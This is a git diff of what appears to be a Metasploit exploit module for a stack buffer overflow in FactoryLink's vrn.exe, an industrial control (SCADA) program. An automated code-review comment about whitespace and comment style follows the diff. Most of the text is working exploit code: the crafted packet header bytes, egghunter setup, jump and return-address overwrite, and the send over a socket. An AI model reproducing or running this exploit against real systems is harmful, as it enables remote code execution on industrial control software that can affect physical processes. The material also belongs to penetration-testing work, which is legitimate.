diff --git a/modules/exploits/windows/scada/factorylink_vrn_09.rb b/modules/exploits/windows/scada/factorylink_vrn_09.rb
index d620c45812..f859efc59d 100644
--- a/modules/exploits/windows/scada/factorylink_vrn_09.rb
+++ b/modules/exploits/windows/scada/factorylink_vrn_09.rb
@@ -21,9 +21,11 @@ class Metasploit3 < Msf::Exploit::Remote
 super(update_info(info,
 'Name' => 'FactoryLink vrn.exe Opcode 9 Buffer Overflow',
 'Description' => %q{
- This module exploits a stack buffer overflow in FactoryLink 7.5, 7.5 SP2, and 8.0.1.703.
- By sending a specially crafted packet, an attacker may be able to execute arbitrary code.
- Originally found and posted by Luigi Auriemma.
+ This module exploits a stack buffer overflow in FactoryLink 7.5, 7.5 SP2,
+ and 8.0.1.703. By sending a specially crafted packet, an attacker may be able to
+ execute arbitrary code due to the improper use of a vsprintf() function while
+ processing the user-supplied text field. Originally found and posted by
+ Luigi Auriemma.
 },
 'Author' => [
@@ -64,30 +66,31 @@ class Metasploit3 < Msf::Exploit::Remote
 def exploit
 connect
+ #The use of egghunter seems appropriate due to the small buffer in [ESP+8]
 hunter = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true, :startreg => 'ebp'})
 egg = hunter[1]
- header = "\x3f\x3f\x3f\x3f"
- header << "\xff\x55"
- header << "\x09\x00"
- header << "\x3f\x3f\xff\xff\x00\x00\x3f\x3f"
- header << "\x01\x00\x3f\x3f\x3f\x3f\x3f\x3f"
- header << "\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f"
- header << "\x3f\x3f"
- header << "\xff\xff\xff\xff"
- header << "\x3f\x3f"
+ header = "\x3f\x3f\x3f\x3f"
+ header << "\xff\x55"
+ header << "\x09\x00"
+ header << "\x3f\x3f\xff\xff\x00\x00\x3f\x3f"
+ header << "\x01\x00\x3f\x3f\x3f\x3f\x3f\x3f"
+ header << "\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f"
+ header << "\x3f\x3f"
+ header << "\xff\xff\xff\xff"
+ header << "\x3f\x3f"
- request = header
- request << rand_text_alpha_upper(100)
- request << egg
- request << ("C" * target['padding'])
- request << "\xeb\x06\x90\x90"
- request << [target.ret].pack('V')
- request << "C"*24
- request << hunter[0]
- request << rand_text_alpha_upper(100000)
+ request = header
+ request << rand_text_alpha_upper(100)
+ request << egg
+ request << rand_text_alpha(target['padding'])
+ request << "\xeb\x06\x90\x90"
+ request << [target.ret].pack('V')
+ request << make_nops(24)
+ request << hunter[0]
+ request << rand_text_alpha_upper(100000)
 print_status("Trying target #{target.name} with #{request.size} bytes")
 sock.put(request)
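Review bot: The rewrite of the `header` and `request` lines in exploit appears to mix a whitespace-only reindent with the functional change, since every `header` line and most `request` lines read identically on both sides apart from leading whitespace; the substantive edits are only `request << rand_text_alpha(target['padding'])` and `request << make_nops(24)`, and keeping the reindent in a separate commit would make those two lines visible in review. The added comment also needs a space after the hash mark to match the usual Ruby comment layout, `# The use of egghunter seems appropriate due to the small buffer in [ESP+8]`. It would be more useful if it also recorded why the fixed fillers were replaced, e.g. `# padding and the 24-byte filler are now randomized on each run instead of fixed bytes`, since nothing in the hunk states the motivation. exploit's body continues outside the hunk.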